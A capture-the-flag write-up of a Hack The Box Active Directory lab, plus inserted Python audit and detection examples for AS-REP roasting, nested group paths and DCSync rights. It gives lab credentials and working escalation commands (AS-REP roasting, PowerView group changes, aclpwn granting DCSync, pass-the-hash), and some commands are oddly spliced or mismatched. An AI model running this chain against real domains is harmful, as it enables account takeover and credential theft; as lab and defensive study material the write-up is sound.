Increasing send delay for 10.10.10.161 from 0 to 5 due to 153 out of 381 dropped probes since last increase.
Nmap scan report for 10.10.10.161
Host is up, received echo-reply ttl 127 (0.063s latency).
Scanned at 2020-01-11 17:17:58 CET for 772s
Not shown: 65511 closed ports
Reason: 65511 resets
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
|fingerprint-strings:
|DNSVersionBindReqTCP:
|version
|_bind
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-11 16:34:24Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49715/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
So now we have a list of users but no password; maybe we could get more information with:
ldapsearch -LLL -x -H ldap://10.10.10.161 -b "DC=HTB,DC=local" -s sub "(objectclass=*)"
But nothing interesting for the moment. I got a bit stuck here for a while, then decided to look at the Kerberos service.
There is a well-known although fairly rare attack: AS-REP Roasting. When a user asks the KDC for a TGT, he must authenticate by providing his password (pre-authentication); the KDC then answers with a KRB_AS_REP packet which contains the session key for the user, encrypted with the user's hash.
However, if the administrator has disabled pre-authentication, anybody can request a TGT for another user. The encrypted part of that reply is keyed with the impersonated user's hash, so we can extract this hash and attempt to crack it or execute a pass-the-hash attack.
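The condition just described (pre-authentication disabled on an account) is something a defender can both audit and detect. The following is an added example written for this page, not code from the original post or from any of the tools it mentions. It assumes nothing about the lab beyond the documented meaning of the userAccountControl flags and of the fields in Windows event 4768; every account record and event line in it is constructed sample data, and svc-demo and old-svc are hypothetical account names.

```python
"""
Added example: two defender-side checks for the AS-REP roasting condition.

  1. accounts_without_preauth(): which accounts have pre-authentication
     disabled, decoded from the userAccountControl attribute an LDAP query
     (such as the ldapsearch above) returns.
  2. suspected_asrep_roast(): which TGT requests (event 4768) were served
     with no pre-authentication and RC4 encryption, the classic signature
     of an AS-REP roast.

All account names and event records below are constructed sample data.
"""
import re

# userAccountControl bit flags (documented values)
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample of an LDAP result for sAMAccountName/userAccountControl.
# svc-demo and old-svc are hypothetical accounts with pre-auth disabled.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "sebastien", "userAccountControl": 0x10200},   # normal user
    {"sAMAccountName": "svc-demo",  "userAccountControl": 0x410200},  # DONT_REQ_PREAUTH set
    {"sAMAccountName": "old-svc",   "userAccountControl": 0x410202},  # pre-auth off, but disabled
]


def accounts_without_preauth(accounts, include_disabled=False):
    """Return sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set.

    Disabled accounts are skipped by default: the KDC will not issue them a
    ticket, so they cannot be roasted, but an auditor may still want them.
    """
    hits = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if not uac & UAC_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UAC_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(acct["sAMAccountName"])
    return hits


# Constructed, simplified 4768 records in the "Field: value" form of Windows
# event text. Pre-Authentication Type 0 means no pre-auth was used; Ticket
# Encryption Type 0x17 is RC4-HMAC, the crackable kind.
SAMPLE_4768_EVENTS = [
    "EventID: 4768 Account Name: sebastien Client Address: ::ffff:10.10.14.5 "
    "Ticket Encryption Type: 0x12 Pre-Authentication Type: 2",
    "EventID: 4768 Account Name: svc-demo Client Address: ::ffff:10.10.14.5 "
    "Ticket Encryption Type: 0x17 Pre-Authentication Type: 0",
    "EventID: 4768 Account Name: krbtgt Client Address: ::ffff:10.10.10.161 "
    "Ticket Encryption Type: 0x12 Pre-Authentication Type: 0",  # AES, not roastable
]

_FIELD = re.compile(
    r"(Account Name|Client Address|Ticket Encryption Type|Pre-Authentication Type): (\S+)"
)


def parse_4768(line):
    """Extract the fields this check needs from one 4768 record."""
    fields = dict(_FIELD.findall(line))
    return {
        "account": fields.get("Account Name"),
        "client": fields.get("Client Address"),
        "etype": int(fields.get("Ticket Encryption Type", "0"), 16),
        "preauth": int(fields.get("Pre-Authentication Type", "-1")),
    }


def suspected_asrep_roast(events):
    """Return (account, client) pairs for TGTs issued with no pre-auth and RC4."""
    suspects = []
    for line in events:
        ev = parse_4768(line)
        if ev["preauth"] == 0 and ev["etype"] == 0x17:
            suspects.append((ev["account"], ev["client"]))
    return suspects


if __name__ == "__main__":
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("suspected roast  :", suspected_asrep_roast(SAMPLE_4768_EVENTS))
```

The first check is what you run before an attacker does (the fix is clearing the "Do not require Kerberos preauthentication" option, or at least enforcing AES so the RC4 hash is never issued); the second is what a SIEM rule over 4768 events looks like, with the AES-only krbtgt request left out on purpose so the rule does not fire on normal traffic.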
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS> net user sebastien /domain
User name sebastien
Full Name Sebastien Caron
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/19/2019 4:29:59 PM
Password expires Never
Password changeable 9/20/2019 4:29:59 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/22/2019 2:29:29 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
We are a member of some interesting groups:
HTB\Privileged IT Accounts
HTB\Service Accounts
There is also the user sebastien in C:\Users\sebastien, but running net user sebastien /domain shows that this user is not very privileged.
Bloodhound
I decided to go through BloodHound in order to identify targets and map the AD. It was my first time using it.
Populating Bloodhound
BloodHound needs data to trace all the relations between AD objects, so we have to collect it ourselves.
I read in the documentation that a user account is required, and I didn't find a way to do it without one. Anyway, the more privileges we have, the easier the escalation will be.
There are at least 3 ways to gather the information:
PS1 script
.exe
python script
My first try was with the python script bloodhound-python (pip install bloodhound). I ran this command:
$ Invoke-BloodHound -LDAPUser svc-alfresco -LDAPPass s3rvice -CollectionMethod All -Verbose
I don't know why I had to provide the LDAP login arguments, but without them the command would fail silently. So now we have a nice zip file which we can drop on an SMB share started with impacket, and feed BloodHound with the JSON files.
path to admin
Once BloodHound is fed, you can choose to start from your compromised user and see which groups it belongs to and which permissions it has on which objects.
Or, if you are lucky, just run a default query like "Find the shortest path to domain admin", as I did.
So:
svc-alfresco is a member of the Privileged IT Accounts group
the Privileged IT Accounts group is a member of the Account Operators group
Account Operators has the GenericAll right on the Exchange Windows Permissions group
the Exchange Windows Permissions group can write the DACL of the HTB.local domain (WriteDacl)
the HTB.local domain contains the Administrator@HTB.local
(Administrator@HTB.local is member of Domain Admins)
Group memberships within AD are applied recursively, so if we have the following hierarchy (each group is a member of the one above it):
Group A
  Group B
    Group C
then a user in C also has the permissions of groups A and B in addition to those of group C.
And the permissions on objects:
GenericAll - full rights to the object (add users to a group or reset a user's password)
WriteOwner - change the object owner to an attacker-controlled user and take over the object
WriteDACL - modify the object's ACEs and give the attacker full control over the object
AllExtendedRights - ability to add a user to a group or reset a password
ForceChangePassword - ability to change a user's password
Self (Self-Membership) - ability to add yourself to a group
So svc-alfresco is part of Account Operators by inheritance. This group has GenericAll rights on Exchange Windows Permissions, which means we can add svc-alfresco to that group. Then, once included in the group, he will have the WriteDACL permission on the HTB.LOCAL domain object.
An ACL specifies who can do what on an object.
We are now allowed to grant svc-alfresco the DCSync privilege! We can then ask a DC for its data, such as the Administrator hash.
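The nested-membership and permission-edge reasoning above can be reproduced on a small graph, which is also the question a defender asks when auditing who can reach the domain object. This is an added example written for this page, not BloodHound's own code: the node and edge names are the ones listed in the path above, while the graph layout and the helper functions are my own construction. It goes a little beyond the page by answering, for any principal, whether a path to a given object exists and which groups the principal effectively belongs to.

```python
"""
Added example: nested group expansion and shortest-path search over a small
AD-style graph. The graph below is constructed to mirror the path in the
post; it is not BloodHound output.

  * effective_groups(): which groups a principal belongs to once nested
    (transitive) MemberOf edges are expanded.
  * shortest_path(): the shortest chain of MemberOf / permission edges from
    a principal to a target object.
  * holds_right(): whether a principal, directly or through any effective
    group, holds a given right on an object.
"""
from collections import deque

# Edge types BloodHound treats as a right over the target object.
ABUSABLE_RIGHTS = {"GenericAll", "WriteOwner", "WriteDacl",
                   "AllExtendedRights", "ForceChangePassword", "Self"}

# Constructed graph: {source: [(edge_type, target), ...]}
GRAPH = {
    "svc-alfresco":                 [("MemberOf", "Service Accounts")],
    "Service Accounts":             [("MemberOf", "Privileged IT Accounts")],
    "Privileged IT Accounts":       [("MemberOf", "Account Operators")],
    "Account Operators":            [("GenericAll", "Exchange Windows Permissions"),
                                     ("GenericAll", "Exchange Trusted Subsystem")],
    "Exchange Trusted Subsystem":   [("MemberOf", "Exchange Windows Permissions")],
    "Exchange Windows Permissions": [("WriteDacl", "HTB.LOCAL")],
    "HTB.LOCAL":                    [("Contains", "Administrator")],
    "sebastien":                    [("MemberOf", "Domain Users")],
}


def effective_groups(graph, principal):
    """Expand MemberOf edges transitively: a member of C is also in B and A."""
    seen, todo = set(), [principal]
    while todo:
        node = todo.pop()
        for edge, target in graph.get(node, []):
            if edge == "MemberOf" and target not in seen:
                seen.add(target)
                todo.append(target)
    return seen


def shortest_path(graph, start, goal):
    """Breadth-first search over MemberOf and abusable-right edges.

    Returns a list of (node, edge, node) hops, or None if no path exists.
    BFS guarantees the path found has the fewest hops, which is what the
    "shortest path" BloodHound query reports.
    """
    allowed = ABUSABLE_RIGHTS | {"MemberOf"}
    queue = deque([(start, [])])
    visited = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for edge, target in graph.get(node, []):
            if edge in allowed and target not in visited:
                visited.add(target)
                queue.append((target, path + [(node, edge, target)]))
    return None


def holds_right(graph, principal, right, obj):
    """Does principal (directly or via any effective group) hold `right` on obj?"""
    for holder in {principal} | effective_groups(graph, principal):
        if (right, obj) in graph.get(holder, []):
            return True
    return False


if __name__ == "__main__":
    print(sorted(effective_groups(GRAPH, "svc-alfresco")))
    for hop in shortest_path(GRAPH, "svc-alfresco", "HTB.LOCAL"):
        print("%s -[%s]-> %s" % hop)
    print(holds_right(GRAPH, "svc-alfresco", "GenericAll", "Exchange Windows Permissions"))
```

Run against the constructed graph, the search returns the five-hop path the post describes rather than the six-hop one through Exchange Trusted Subsystem, and the same functions answer the defender's question of whether an ordinary user such as sebastien has any path at all (he does not).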
road to admin
BloodHound can describe each step towards our target. For example, we need to add svc-alfresco to the Exchange Windows Permissions group, using the GenericAll permission:
$SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Then, use Add-DomainGroupMember, optionally specifying $Cred if you are not already running a process as ACCOUNT OPERATORS@HTB.LOCAL:
Add-DomainGroupMember -Identity 'Exchange Windows Permission' -Members 'svc-alfresco' -Credential $Cred
Using PowerView
or using only the built-in net command, without any PowerView cmdlet:
$ net group "Exchange Windows Permission" "svc-alfresco" /add /domain
Then we have to write an ACE on the HTB.local domain object to grant ourselves the DCSync right.
We now have the right to perform a DC synchronisation with svc-alfresco.
But if you are really lazy you can use ACLpwn (https://github.com/fox-it/aclpwn.py) once you have identified a potential path. The script will make the changes for you:
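The change just made, an ACE on the domain object that hands a service account the replication extended rights, is exactly what a defender should look for on the domain DACL. The following is an added example written for this page, not code from aclpwn or any other tool on the page: the two control-access-right GUIDs are the documented ones, but the ACE tuples, the expected-holder list and the trustee names (svc-alfresco taken from the post, backup-svc hypothetical) are constructed sample data.

```python
"""
Added example: audit a domain object's DACL for principals that hold the
replication extended rights DCSync needs, outside the set that should have
them. ACEs are represented as simple tuples rather than a real security
descriptor; the GUIDs are the documented control-access right GUIDs.
"""
# Extended rights needed to replicate directory data (documented GUIDs)
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

ADS_RIGHT_DS_CONTROL_ACCESS = 0x100   # mask bit that carries extended rights
ADS_RIGHT_WRITE_DAC = 0x40000         # WriteDacl: not DCSync, but lets you grant it

# Principals that legitimately hold replication rights on a domain object.
# Constructed allowlist for the sample domain; adapt to the real environment.
EXPECTED_HOLDERS = {
    "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS",
    "HTB\\Domain Controllers",
    "BUILTIN\\Administrators",
    "HTB\\Enterprise Admins",
    "HTB\\Domain Admins",
}

# Constructed ACEs from the domain object's DACL as
# (ace_type, trustee, access_mask, object_type_guid). A None GUID means the
# ACE is not object-specific and covers every extended right.
SAMPLE_DACL = [
    ("ALLOW", "NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS", 0x100, DS_REPLICATION_GET_CHANGES),
    ("ALLOW", "HTB\\Domain Controllers", 0x100, DS_REPLICATION_GET_CHANGES_ALL),
    ("ALLOW", "HTB\\Domain Admins", 0xF01FF, None),                  # full control
    ("ALLOW", "HTB\\svc-alfresco", 0x100, DS_REPLICATION_GET_CHANGES),
    ("ALLOW", "HTB\\svc-alfresco", 0x100, DS_REPLICATION_GET_CHANGES_ALL),
    ("ALLOW", "HTB\\backup-svc", 0x100, DS_REPLICATION_GET_CHANGES),  # hypothetical
    ("DENY",  "HTB\\backup-svc", 0x100, DS_REPLICATION_GET_CHANGES),  # deny wins
    ("ALLOW", "HTB\\Exchange Windows Permissions", ADS_RIGHT_WRITE_DAC, None),
]


def replication_rights_per_trustee(dacl):
    """Return {trustee: set(replication rights)} after applying deny-over-allow."""
    allowed, denied = {}, {}
    for ace_type, trustee, mask, guid in dacl:
        if not mask & ADS_RIGHT_DS_CONTROL_ACCESS:
            continue  # no extended rights in this ACE (e.g. WriteDacl only)
        rights = REPLICATION_RIGHTS if guid is None else {guid} & REPLICATION_RIGHTS
        if not rights:
            continue  # an extended right we do not care about here
        bucket = allowed if ace_type == "ALLOW" else denied
        bucket.setdefault(trustee, set()).update(rights)
    effective = {}
    for trustee, rights in allowed.items():
        remaining = rights - denied.get(trustee, set())
        if remaining:
            effective[trustee] = remaining
    return effective


def unexpected_dcsync_holders(dacl, expected=EXPECTED_HOLDERS):
    """Trustees outside the expected set holding any replication right."""
    return sorted(t for t in replication_rights_per_trustee(dacl) if t not in expected)


if __name__ == "__main__":
    for trustee, rights in replication_rights_per_trustee(SAMPLE_DACL).items():
        print(trustee, sorted(rights))
    print("unexpected:", unexpected_dcsync_holders(SAMPLE_DACL))
```

Note how the Exchange Windows Permissions entry is not reported: WriteDacl on the domain is not a replication right by itself, which is precisely why the post needs the extra step of writing a new ACE. On a real domain the same check is fed from the nTSecurityDescriptor of the domain root, and a change to that attribute is also what Directory Service event 5136 records, so the audit and the detection point at the same object.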
Please supply the password or LM:NTLM hashes of the account you are escalating from:
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer)
[-] Invalid path, skipping
[+] Path found!
Path [0]: (SVC-ALFRESCO@HTB.LOCAL)-[MemberOf]->(SERVICE ACCOUNTS@HTB.LOCAL)-[MemberOf]->(PRIVILEGED IT ACCOUNTS@HTB.LOCAL)-[MemberOf]->(ACCOUNT OPERATORS@HTB.LOCAL)-[GenericAll]->(EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL)-[MemberOf]->(EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL)-[WriteDacl]->(HTB.LOCAL)
[!] Unsupported operation: GetChanges on HTB.LOCAL (Domain)
[-] Invalid path, skipping
[+] Path found!
Path [1]: (SVC-ALFRESCO@HTB.LOCAL)-[MemberOf]->(SERVICE ACCOUNTS@HTB.LOCAL)-[MemberOf]->(PRIVILEGED IT ACCOUNTS@HTB.LOCAL)-[MemberOf]->(ACCOUNT OPERATORS@HTB.LOCAL)-[GenericAll]->(EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL)-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 1
[-] Memberof ->continue
[-] Memberof ->continue
[-] Memberof ->continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of SVC-ALFRESCO@HTB.LOCAL
[+] Re-bind successful
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20200115-102327.restore
Some operations are not supported, so it's possible that the script gives up on some paths even though they are feasible.
Here it found 2 paths; I chose the shortest one as it leaves less room for mistakes. As you can see, it added the user to the right group and modified the ACL as we wanted!
We now have to perform a DC synchronisation. I read a lot about using Mimikatz to do it, however we don't have admin rights to use it. So I tried to find other ways.
At first sight I thought I was lacking permissions, but waiting a bit gave the hashes! I fed john with them but I only got the santi password, which is useless. I didn't use crackstation to see if the hash was well known, as in HTB, if the password isn't in rockyou, it's not intended to be breakable.
Pass The Hash
On several Windows services you can authenticate with only the hash; CrackMapExec, for example, allows us to query SMB services with only the hash.